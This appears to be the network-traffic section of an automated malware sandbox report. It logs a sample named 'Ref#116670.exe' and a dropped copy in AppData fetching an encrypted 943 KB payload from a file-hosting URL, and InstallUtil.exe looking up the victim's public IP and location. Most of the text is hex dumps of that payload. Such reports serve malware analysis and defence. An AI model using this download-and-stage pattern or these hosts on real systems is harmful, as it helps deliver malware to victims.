                                                                                                                                X-Request-ID: 9edf4eee96eeeee8a2bc13b4160e35ec
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549713194.15.112.2484436648C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-03 14:20:14 UTC61OUTGET /RMDT HTTP/1.1
                                                                                                                                Host: oshi.at
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-03 14:20:15 UTC316INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:15 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 943112
                                                                                                                                Connection: close
                                                                                                                                ETag: "5704373799c6b7660579aea83dd8e3e8"
                                                                                                                                Content-Disposition: attachment; filename=HAeP.dat
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 21:48:59 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                2024-12-03 14:20:15 UTC3767INData Raw: 46 89 7a c9 e2 f4 ed e7 6a 96 7c ef 6d 05 76 68 e0 e1 b0 d1 59 9f 8c 4c 08 c8 9d 94 9e 9f 9d d6 82 55 e6 50 73 cc 23 20 76 7e 18 32 1a 9c 33 6e 46 c8 a8 b3 bc a2 8f b8 13 fd ed c6 fa fb c1 7d 6f 2a 57 a7 e2 e1 f7 67 d8 fd d3 1b 74 83 34 57 37 61 0b 14 22 89 6e 70 1b ba e4 28 f9 e4 42 3b 32 4a a0 6d 2c 61 b0 0f 23 ac 78 cb 92 f3 14 6f 6f 25 80 65 ac d5 b2 ff 54 cb c7 02 54 1b 68 8d 2a 8a 10 a3 79 4e ca c9 d9 32 fd b0 b2 60 23 dc 67 62 17 56 85 36 7e 6e 88 62 1a d9 ee 0b 9d 05 bc c4 69 2a 14 19 3f 23 43 9f 4f 33 ac 5e 0c da af f3 1c 39 ec c1 33 e6 0a 9a 5f 49 b9 9d 85 c5 80 41 91 5d b1 c6 2a 65 70 63 ae c0 f7 3c 3c 72 4e eb 59 1d e9 e0 5e 72 a7 77 71 1d 5d 73 bd bb 17 33 4d 86 31 6e 1c 2f f3 b1 a5 c8 43 75 9b 97 3b ba d5 68 fa 58 33 39 24 ce 3c 75 e8 9a 76
                                                                                                                                Data Ascii: Fzj|mvhYLUPs# v~23nF}o*Wgt4W7a"np(B;2Jm,a#xoo%eTTh*yN2`#gbV6~nbi*?#CO3^93_IA]*epc<<rNY^rwq]s3M1n/Cu;hX39$<uv
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: 56 90 b8 0a c8 73 3b a3 d0 07 63 4c 8f 33 4a a2 db 48 39 73 36 ff 0d 0f de a4 4f ac aa 45 55 08 18 6f 88 1d 9e b2 30 3b a5 25 e7 8d 5d 53 40 c8 e6 3a 42 a9 33 39 64 75 04 e5 b6 d7 b9 c8 ba 62 92 d8 7f 9b e3 65 3b 59 70 20 34 b5 37 25 c6 f0 77 bb ab 72 14 f6 90 ff 4d b4 6b c8 48 44 cc c2 ce ca a7 47 af 71 c0 22 c5 87 38 b2 aa c5 bb 8c 9a 49 3a c1 b6 e7 3b b7 d7 e8 01 26 3a ae ed 12 ea 69 47 64 78 78 27 d4 a5 01 52 5a df c0 82 4a 07 15 be f9 8a 3a 23 09 64 ad 35 e6 60 6b de 7c 80 23 88 94 ed c6 71 92 5c 63 15 44 8d 83 8f 31 2b 00 f3 87 8d 41 d9 39 5c 2c 4a 0e 9d f6 3c 0d 53 b5 bd 60 81 8b a5 1c ce dd 46 59 26 80 0e 74 d5 63 84 47 ef f2 b5 da e6 73 43 af 5c 20 a4 2b 15 72 e9 87 7c 27 57 fe 4e ae 90 e1 05 0e 9d 69 6a 05 04 6b 42 df 06 a0 9e 2e 07 cf 9e f7 c1
                                                                                                                                Data Ascii: Vs;cL3JH9s6OEUo0;%]S@:B39dube;Yp 47%wrMkHDGq"8I:;&:iGdxx'RZJ:#d5`k|#q\cD1+A9\,J<S`FY&tcGsC\ +r|'WNijkB.
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: 2a 7e 25 85 71 7b 1a 2e 4d db 81 20 86 9b 9b 98 15 2f be 2c 4f b2 27 3a 85 ba d8 f6 25 34 ae 4c 6b ca 7f 75 f0 ed 06 16 12 a0 5b a7 9c f1 f1 fd aa b0 8d 89 f7 94 2d 86 62 79 53 3e 09 f7 05 d3 de c3 90 03 84 00 4e 3e d9 d7 c7 15 1c b0 94 a7 0a b7 80 d1 fc e9 1e 31 c9 b3 c2 9f 8c d7 3e 3e 4d c3 25 bb e9 9b 71 d4 46 77 93 33 26 57 cd 4c ba c4 60 04 30 26 9a 4c b4 8d 49 ac c7 dd bb 79 b8 b3 43 a7 fd 8a 76 5e 55 86 95 19 49 37 2e 9e a3 27 26 03 5c 78 80 53 ea 6e 14 60 4a e8 ce 46 0c 06 32 7c 10 96 7f 87 e8 7b 3a 5d 42 62 8a 6f 89 80 e1 dd 0b 0d f6 68 01 76 15 6a a0 2a 91 2f 81 b1 19 cf 7e ac aa 8e ea 41 0c 29 1d bc 2a 73 fc d5 b4 54 77 89 29 83 e8 b3 0f 19 29 c4 bf 14 75 4e 5b 87 6d 63 b1 71 0d 44 46 ce 2a 3a b4 8f c4 2a 03 d1 50 0e e3 15 60 b2 20 66 3f 48 7d
                                                                                                                                Data Ascii: *~%q{.M /,O':%4Lku[-byS>N>1>>M%qFw3&WL`0&LIyCv^UI7.'&\xSn`JF2|{:]Bbohvj*/~A)*sTw))uN[mcqDF*:*P` f?H}
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: 58 9d 6b e6 f6 e1 34 bf b1 c1 19 5d c1 54 fc 4d 61 c5 4d cb 0e 76 48 e9 3c c8 a4 be 31 9a 13 4b c6 06 d1 eb 7d 21 da 17 92 b4 88 37 d7 60 77 45 f1 84 e7 99 79 1d bc 73 b2 dd de 7d ff 68 fc ed 4f 9a fa f8 91 b2 be 9a b2 67 bd d9 21 f4 ee d3 68 76 49 b2 1f 41 36 6f 77 3a 1b 4b 4b e2 51 b3 23 0f 9b d9 5a f8 0f 79 30 1f fc 08 c5 83 73 b1 b3 4c 30 d1 b4 49 48 48 30 47 3f 2b e2 6e 11 fa 20 33 08 84 e9 64 fa 35 f2 bd 50 a5 b5 da b6 6a 27 b7 91 c2 06 4e 11 73 dc d9 b1 66 82 b7 dc 51 59 77 34 bd a4 3e ce 74 0f 06 8b 6e 3a ff bf 76 9b f7 b9 01 5c 81 82 d8 53 97 24 94 51 5f c7 06 52 96 ae 62 4f 23 96 06 68 35 ef 88 95 48 72 e0 d6 00 80 42 c4 69 84 d9 27 ef a9 9a 4e 49 5e c4 1c 2d 58 c2 8b 2c 44 26 16 f6 fa 30 28 9a cd 87 0c 03 53 3b fa db 19 71 d4 b0 8c ac 08 f1 c2
                                                                                                                                Data Ascii: Xk4]TMaMvH<1K}!7`wEys}hOg!hvIA6ow:KKQ#Zy0sL0IHH0G?+n 3d5Pj'NsfQYw4>tn:v\S$Q_RbO#h5HrBi'NI^-X,D&0(S;q
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: df e4 4e 27 a8 bb 18 73 27 9e 97 69 c5 8b 71 c3 7e 52 7c 2f 85 ef dd 80 54 12 8f 58 a2 41 55 e5 07 e0 b0 89 e8 a3 26 e3 c0 98 c4 c3 63 32 81 71 06 5a 48 04 f4 f0 20 8f 0e 15 f5 35 53 03 31 b1 ff d3 81 7d 08 d2 95 83 02 7a 84 f1 8c 2e d0 63 1b 5d 99 38 e1 b1 49 37 11 cb f4 72 9f 09 f0 57 e9 2a ee 4c c4 35 f7 0e fa b3 60 1b d5 19 7c 04 e0 2a aa bc 7d 1e 12 78 b0 92 8d 3f ea 4f cf 1d 3a 76 bf c7 35 09 3c 1f 8f 34 3d d1 a8 20 c6 88 a2 37 ba 2d e6 f8 82 33 a6 a9 8d 80 41 a9 e3 a6 73 ff 64 78 a7 87 fc 57 57 c7 4c c6 f0 87 70 5f 69 81 96 1e 03 dc 57 98 a2 cf 9d ad c9 dd 14 26 56 95 54 21 ea 63 27 54 19 62 82 e4 73 24 c3 f7 4e a1 e1 9c a1 ec 8b 09 2d 56 61 91 c9 18 e6 f1 32 92 39 eb 15 5f f6 bc 00 f4 e8 17 4a 89 e9 00 73 7e fa 1d 53 51 4c 34 ed 12 5b 22 36 16 f4
                                                                                                                                Data Ascii: N's'iq~R|/TXAU&c2qZH 5S1}z.c]8I7rW*L5`|*}x?O:v5<4= 7-3AsdxWWLp_iW&VT!c'Tbs$N-Va29_Js~SQL4["6
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: ef 6a a5 b4 80 ff 68 60 c0 fb 9a 2e e9 62 6d ef 39 1f 86 6c ce 60 34 e8 43 f9 06 40 de f2 51 a1 2d 29 8f a3 8c e5 f3 d7 11 db 59 70 d8 43 48 2a 9a b8 49 bb 5b e3 b1 43 1b c8 39 72 6f a4 95 59 6f 56 ca 00 81 8f f9 50 4b 84 5f bc ef 87 99 73 0d 06 43 62 3c 9f 9a 7d 1f 68 10 f8 6f 24 c7 c8 43 7c 14 12 2b ca 9d c0 9d 51 f5 b1 f5 f8 85 56 1a 25 00 bf 0c 32 33 2f 0e 01 cd a1 96 a6 6f c4 ed bc ff e0 ea ba 11 6a f4 86 8d ec a1 ab 2b d1 63 55 0c 0e 36 eb 24 d0 3a f0 53 d9 d8 4c 1d 53 29 a3 16 94 76 97 d6 c1 b2 fe 1b 50 77 13 2a 20 23 94 ce e1 3b 38 33 39 4c 24 f7 2e 0d 6f 76 4c d6 45 78 1c 65 d1 39 ed 6d 9b 42 34 f6 4b 5f bd 47 38 0b 9d ab cb 17 12 f3 1d c1 98 7e 02 95 c0 ea a6 c6 8a a9 b2 7a 0f ae 17 ca 1a a7 e1 65 1b af d6 ae e4 6a 40 e7 50 1c c0 92 b8 e3 3c 7d
                                                                                                                                Data Ascii: jh`.bm9l`4C@Q-)YpCH*I[C9roYoVPK_sCb<}ho$C|+QV%23/oj+cU6$:SLS)vPw* #;839L$.ovLExe9mB4K_G8~zej@P<}
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: 34 a9 6d 44 09 04 27 cf 05 d7 9c d4 9a 6f bd 2f ab 17 bf 12 53 07 89 d9 52 8c 89 33 ea 3c 1f 5f 4c 6e 5c 3b 99 26 8a bc 5e 8a ba 4e ad 75 89 38 19 61 39 fa ed 47 55 98 4d 1b 41 79 a0 de 41 2d 39 c6 6c 29 42 dc c8 d9 99 70 11 05 65 44 3f 22 b7 03 3a b5 fe e3 f0 5e 6b 3e 32 4d 23 a1 f0 e5 61 07 fa a2 34 0f 45 27 f2 c9 b3 6d fd dc 84 00 0a d8 ee 33 c8 2a 94 15 4a ef 60 11 4c 31 7b 99 e9 b0 e4 c3 1c d6 06 01 2d e4 0f a7 a0 fa 1d 4b 2d e5 0c f2 0d 72 14 91 03 40 a9 35 0c 06 ed d7 82 11 df 81 35 4b 32 01 6f aa bd 65 73 20 95 39 92 2d 60 f8 5b 0f cb 9d 9a 92 69 c5 70 4d 48 62 42 6d 51 69 7b 08 30 d6 40 9b 87 f5 64 cf 3a be a1 8f dc 78 5f 20 42 1b ad d2 39 74 1a 57 8d f5 60 bc 74 8e 0c 98 5d b1 76 f8 24 05 1e d1 15 83 18 37 ed d4 a1 67 ce 37 e7 14 a4 15 5c 64 df
                                                                                                                                Data Ascii: 4mD'o/SR3<_Ln\;&^Nu8a9GUMAyA-9l)BpeD?":^k>2M#a4E'm3*J`L1{-K-r@55K2oes 9-`[ipMHbBmQi{0@d:x_ B9tW`t]v$7g7\d
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: 68 a7 e9 f0 93 c5 0f b8 ae 03 b4 99 83 8a c2 3a b4 54 fb 0c cf a6 9f d2 e8 5c c6 ec e2 19 84 aa 99 d0 95 b0 83 52 9d 61 99 37 8e 47 17 50 53 a7 e2 66 42 56 60 2c a0 fd 0b 1b 0f 52 4a 95 09 26 fa 64 61 d0 f8 aa 31 e8 d5 81 03 e3 1a 3d 4d 21 aa 56 c0 46 70 33 fc 62 62 ec 04 eb 7e 64 c9 76 51 09 ec 9d 1d 16 ac 29 19 65 2d 5c 0c 38 a0 2e 85 f8 a7 cd 7a 6b 2a c5 c5 d3 7c b1 d6 a5 e4 a4 c4 4c 01 61 8c dd 84 26 80 65 9b 5e f8 5f bf 27 05 70 83 75 52 18 0f 0b 91 95 35 89 0c 2b 69 24 4a 35 b8 e8 93 7b b6 f8 4c 16 9a 52 3c 81 d4 d2 e8 75 55 d1 dd db 61 d4 d3 8d 17 17 7d 04 07 3d af b6 da 13 93 93 c5 27 3a 97 f9 c0 0d bf 06 8c d4 16 17 6d fa ab ba 46 90 f9 17 ec b1 80 f8 01 1e a9 85 f5 e1 cb 0c b5 f3 22 bc 8d b6 74 fe 0a 9c 09 ec 7e 13 cf 6d 9f f9 4e f0 63 83 7b 93
                                                                                                                                Data Ascii: h:T\Ra7GPSfBV`,RJ&da1=M!VFp3bb~dvQ)e-\8.zk*|La&e^_'puR5+i$J5{LR<uUa}=':mF"t~mNc{
                                                                                                                                2024-12-03 14:20:15 UTC676INData Raw: 9c 37 01 e0 dd d2 ae 71 c5 a1 2e 8c 0c de 41 87 5d 37 ae 35 b3 d7 b6 73 47 5d f3 80 3d ea e7 00 39 8c cb 94 72 e4 c2 3a 07 d0 f6 c6 32 54 0d 93 f0 de 7c f5 a6 55 9a 33 22 3a 5f d3 90 86 44 b1 75 c4 68 b0 5a 9d 04 33 9d f8 f1 f3 6a 02 9c d9 f6 7a 51 21 c5 4f 80 09 c4 76 b0 01 dc a2 31 cf 53 1f ef 7a 1b ff d1 cd b3 d0 da 1a 04 7a 1f 61 fe 87 46 c9 39 15 10 9a e8 94 dc 44 c0 dc dd ae 15 64 cd ba f2 39 2c 2c 6b fe 58 b3 68 d5 55 eb d3 2d 04 97 fe cb 16 ce 73 d0 bb 1e 25 f0 ae 2b 46 a6 91 f5 7e 41 40 af 3f 39 8c 3f ca 03 c6 c4 08 2e c9 65 cf 80 ca 13 ed 90 dc 9b c8 26 c5 5b 50 c1 9c de d6 48 02 d6 c9 2f 9c 4d bf bc 82 1c d5 f3 50 f4 a4 14 7b 80 5f 3a a0 3e 25 05 b0 a0 fe 6a 43 92 5d 20 d6 5d 25 af 08 12 c1 94 8e bf 86 3a 17 8e 13 af 73 d1 85 5f 2c 9d 4e 6a 54
                                                                                                                                Data Ascii: 7q.A]75sG]=9r:2T|U3":_DuhZ3jzQ!Ov1SzzaF9Dd9,,kXhU-s%+F~A@?9?.e&[PH/MP{_:>%jC] ]%:s_,NjT
                                                                                                                                2024-12-03 14:20:15 UTC4096INData Raw: 89 1a 90 56 79 32 04 45 e5 79 a3 e9 22 03 a0 e0 09 3b bf e2 59 5d 37 68 8e ad 2b 35 bd c9 cd 96 6c c8 b3 06 07 b2 b9 e2 05 32 7c 41 03 6d c3 55 77 82 7a 16 3c 1a fd 8e e8 13 30 e8 dc b0 09 83 02 78 89 20 b3 c7 68 ce 6a 28 30 d9 fd c1 3b b5 f2 42 f8 1e db ea 5a 88 7a c6 ec 7b 63 8d d1 86 0d f2 12 20 d3 87 9a 9a ed cb 50 88 bb 31 b6 b3 fd 09 33 6a 0f 69 88 2d 27 51 5f 69 88 41 7b 71 57 89 5e 50 90 ec 71 e6 2f b7 fb 92 b3 8e 5f e7 10 f6 4e 6c f1 17 93 d5 3c f0 41 d9 2f db 42 44 6b 17 83 da a3 4b c4 ba bb e5 9e bd b0 07 fa 31 66 8b 00 00 34 12 ee 9c 11 89 dc de 9b 09 33 6d 82 80 da 2e 1c 9c 60 0a 87 9b 56 80 f5 a1 86 ae 32 69 e4 78 32 35 5f ff ea 7c 19 23 35 82 90 9a fa 23 e4 d3 66 e1 44 c3 f2 da bf 03 72 d2 7f 18 2e 1a 20 9b 63 ad c9 7d a1 e0 af cf 6d 8d bb
                                                                                                                                Data Ascii: Vy2Ey";Y]7h+5l2|AmUwz<0x hj(0;BZz{c P13ji-'Q_iA{qW^Pq/_Nl<A/BDkK1f43m.`V2ix25_|#5#fDr. c}m


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.549722172.67.177.1344436780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-03 14:20:37 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-03 14:20:37 UTC882INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:37 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 113060
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca1yoTqK%2BB9gchVuv%2F2xBNQUAn%2FB7isStP7%2FPYYrGbhMHu79KlPWCKuyoglQo5ZWAoqP5FzGBLkh13GikP8QzzFSdZGqdWY6PbM0CZwBj%2FSMzUREkQH1m3Tk%2FYeliMPVFZ8Pa7D4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ec432cd0ced4370-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1760&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1593886&cwnd=231&unsent_bytes=0&cid=99a62bbe100a239d&ts=469&x=0"
                                                                                                                                2024-12-03 14:20:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.549738194.15.112.2484435704C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-03 14:20:44 UTC61OUTGET /RMDT HTTP/1.1
                                                                                                                                Host: oshi.at
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-03 14:20:44 UTC316INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:44 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 943112
                                                                                                                                Connection: close
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 21:48:59 GMT
                                                                                                                                Content-Disposition: attachment; filename=HAeP.dat
                                                                                                                                ETag: "5704373799c6b7660579aea83dd8e3e8"
                                                                                                                                2024-12-03 14:20:44 UTC3767INData Raw: 46 89 7a c9 e2 f4 ed e7 6a 96 7c ef 6d 05 76 68 e0 e1 b0 d1 59 9f 8c 4c 08 c8 9d 94 9e 9f 9d d6 82 55 e6 50 73 cc 23 20 76 7e 18 32 1a 9c 33 6e 46 c8 a8 b3 bc a2 8f b8 13 fd ed c6 fa fb c1 7d 6f 2a 57 a7 e2 e1 f7 67 d8 fd d3 1b 74 83 34 57 37 61 0b 14 22 89 6e 70 1b ba e4 28 f9 e4 42 3b 32 4a a0 6d 2c 61 b0 0f 23 ac 78 cb 92 f3 14 6f 6f 25 80 65 ac d5 b2 ff 54 cb c7 02 54 1b 68 8d 2a 8a 10 a3 79 4e ca c9 d9 32 fd b0 b2 60 23 dc 67 62 17 56 85 36 7e 6e 88 62 1a d9 ee 0b 9d 05 bc c4 69 2a 14 19 3f 23 43 9f 4f 33 ac 5e 0c da af f3 1c 39 ec c1 33 e6 0a 9a 5f 49 b9 9d 85 c5 80 41 91 5d b1 c6 2a 65 70 63 ae c0 f7 3c 3c 72 4e eb 59 1d e9 e0 5e 72 a7 77 71 1d 5d 73 bd bb 17 33 4d 86 31 6e 1c 2f f3 b1 a5 c8 43 75 9b 97 3b ba d5 68 fa 58 33 39 24 ce 3c 75 e8 9a 76
                                                                                                                                Data Ascii: Fzj|mvhYLUPs# v~23nF}o*Wgt4W7a"np(B;2Jm,a#xoo%eTTh*yN2`#gbV6~nbi*?#CO3^93_IA]*epc<<rNY^rwq]s3M1n/Cu;hX39$<uv
                                                                                                                                2024-12-03 14:20:44 UTC4096INData Raw: 56 90 b8 0a c8 73 3b a3 d0 07 63 4c 8f 33 4a a2 db 48 39 73 36 ff 0d 0f de a4 4f ac aa 45 55 08 18 6f 88 1d 9e b2 30 3b a5 25 e7 8d 5d 53 40 c8 e6 3a 42 a9 33 39 64 75 04 e5 b6 d7 b9 c8 ba 62 92 d8 7f 9b e3 65 3b 59 70 20 34 b5 37 25 c6 f0 77 bb ab 72 14 f6 90 ff 4d b4 6b c8 48 44 cc c2 ce ca a7 47 af 71 c0 22 c5 87 38 b2 aa c5 bb 8c 9a 49 3a c1 b6 e7 3b b7 d7 e8 01 26 3a ae ed 12 ea 69 47 64 78 78 27 d4 a5 01 52 5a df c0 82 4a 07 15 be f9 8a 3a 23 09 64 ad 35 e6 60 6b de 7c 80 23 88 94 ed c6 71 92 5c 63 15 44 8d 83 8f 31 2b 00 f3 87 8d 41 d9 39 5c 2c 4a 0e 9d f6 3c 0d 53 b5 bd 60 81 8b a5 1c ce dd 46 59 26 80 0e 74 d5 63 84 47 ef f2 b5 da e6 73 43 af 5c 20 a4 2b 15 72 e9 87 7c 27 57 fe 4e ae 90 e1 05 0e 9d 69 6a 05 04 6b 42 df 06 a0 9e 2e 07 cf 9e f7 c1
                                                                                                                                Data Ascii: Vs;cL3JH9s6OEUo0;%]S@:B39dube;Yp 47%wrMkHDGq"8I:;&:iGdxx'RZJ:#d5`k|#q\cD1+A9\,J<S`FY&tcGsC\ +r|'WNijkB.
                                                                                                                                2024-12-03 14:20:44 UTC4096INData Raw: 2a 7e 25 85 71 7b 1a 2e 4d db 81 20 86 9b 9b 98 15 2f be 2c 4f b2 27 3a 85 ba d8 f6 25 34 ae 4c 6b ca 7f 75 f0 ed 06 16 12 a0 5b a7 9c f1 f1 fd aa b0 8d 89 f7 94 2d 86 62 79 53 3e 09 f7 05 d3 de c3 90 03 84 00 4e 3e d9 d7 c7 15 1c b0 94 a7 0a b7 80 d1 fc e9 1e 31 c9 b3 c2 9f 8c d7 3e 3e 4d c3 25 bb e9 9b 71 d4 46 77 93 33 26 57 cd 4c ba c4 60 04 30 26 9a 4c b4 8d 49 ac c7 dd bb 79 b8 b3 43 a7 fd 8a 76 5e 55 86 95 19 49 37 2e 9e a3 27 26 03 5c 78 80 53 ea 6e 14 60 4a e8 ce 46 0c 06 32 7c 10 96 7f 87 e8 7b 3a 5d 42 62 8a 6f 89 80 e1 dd 0b 0d f6 68 01 76 15 6a a0 2a 91 2f 81 b1 19 cf 7e ac aa 8e ea 41 0c 29 1d bc 2a 73 fc d5 b4 54 77 89 29 83 e8 b3 0f 19 29 c4 bf 14 75 4e 5b 87 6d 63 b1 71 0d 44 46 ce 2a 3a b4 8f c4 2a 03 d1 50 0e e3 15 60 b2 20 66 3f 48 7d
                                                                                                                                Data Ascii: *~%q{.M /,O':%4Lku[-byS>N>1>>M%qFw3&WL`0&LIyCv^UI7.'&\xSn`JF2|{:]Bbohvj*/~A)*sTw))uN[mcqDF*:*P` f?H}
                                                                                                                                2024-12-03 14:20:45 UTC4096INData Raw: 58 9d 6b e6 f6 e1 34 bf b1 c1 19 5d c1 54 fc 4d 61 c5 4d cb 0e 76 48 e9 3c c8 a4 be 31 9a 13 4b c6 06 d1 eb 7d 21 da 17 92 b4 88 37 d7 60 77 45 f1 84 e7 99 79 1d bc 73 b2 dd de 7d ff 68 fc ed 4f 9a fa f8 91 b2 be 9a b2 67 bd d9 21 f4 ee d3 68 76 49 b2 1f 41 36 6f 77 3a 1b 4b 4b e2 51 b3 23 0f 9b d9 5a f8 0f 79 30 1f fc 08 c5 83 73 b1 b3 4c 30 d1 b4 49 48 48 30 47 3f 2b e2 6e 11 fa 20 33 08 84 e9 64 fa 35 f2 bd 50 a5 b5 da b6 6a 27 b7 91 c2 06 4e 11 73 dc d9 b1 66 82 b7 dc 51 59 77 34 bd a4 3e ce 74 0f 06 8b 6e 3a ff bf 76 9b f7 b9 01 5c 81 82 d8 53 97 24 94 51 5f c7 06 52 96 ae 62 4f 23 96 06 68 35 ef 88 95 48 72 e0 d6 00 80 42 c4 69 84 d9 27 ef a9 9a 4e 49 5e c4 1c 2d 58 c2 8b 2c 44 26 16 f6 fa 30 28 9a cd 87 0c 03 53 3b fa db 19 71 d4 b0 8c ac 08 f1 c2
                                                                                                                                Data Ascii: Xk4]TMaMvH<1K}!7`wEys}hOg!hvIA6ow:KKQ#Zy0sL0IHH0G?+n 3d5Pj'NsfQYw4>tn:v\S$Q_RbO#h5HrBi'NI^-X,D&0(S;q
                                                                                                                                2024-12-03 14:20:45 UTC4096INData Raw: df e4 4e 27 a8 bb 18 73 27 9e 97 69 c5 8b 71 c3 7e 52 7c 2f 85 ef dd 80 54 12 8f 58 a2 41 55 e5 07 e0 b0 89 e8 a3 26 e3 c0 98 c4 c3 63 32 81 71 06 5a 48 04 f4 f0 20 8f 0e 15 f5 35 53 03 31 b1 ff d3 81 7d 08 d2 95 83 02 7a 84 f1 8c 2e d0 63 1b 5d 99 38 e1 b1 49 37 11 cb f4 72 9f 09 f0 57 e9 2a ee 4c c4 35 f7 0e fa b3 60 1b d5 19 7c 04 e0 2a aa bc 7d 1e 12 78 b0 92 8d 3f ea 4f cf 1d 3a 76 bf c7 35 09 3c 1f 8f 34 3d d1 a8 20 c6 88 a2 37 ba 2d e6 f8 82 33 a6 a9 8d 80 41 a9 e3 a6 73 ff 64 78 a7 87 fc 57 57 c7 4c c6 f0 87 70 5f 69 81 96 1e 03 dc 57 98 a2 cf 9d ad c9 dd 14 26 56 95 54 21 ea 63 27 54 19 62 82 e4 73 24 c3 f7 4e a1 e1 9c a1 ec 8b 09 2d 56 61 91 c9 18 e6 f1 32 92 39 eb 15 5f f6 bc 00 f4 e8 17 4a 89 e9 00 73 7e fa 1d 53 51 4c 34 ed 12 5b 22 36 16 f4
                                                                                                                                Data Ascii: N's'iq~R|/TXAU&c2qZH 5S1}z.c]8I7rW*L5`|*}x?O:v5<4= 7-3AsdxWWLp_iW&VT!c'Tbs$N-Va29_Js~SQL4["6
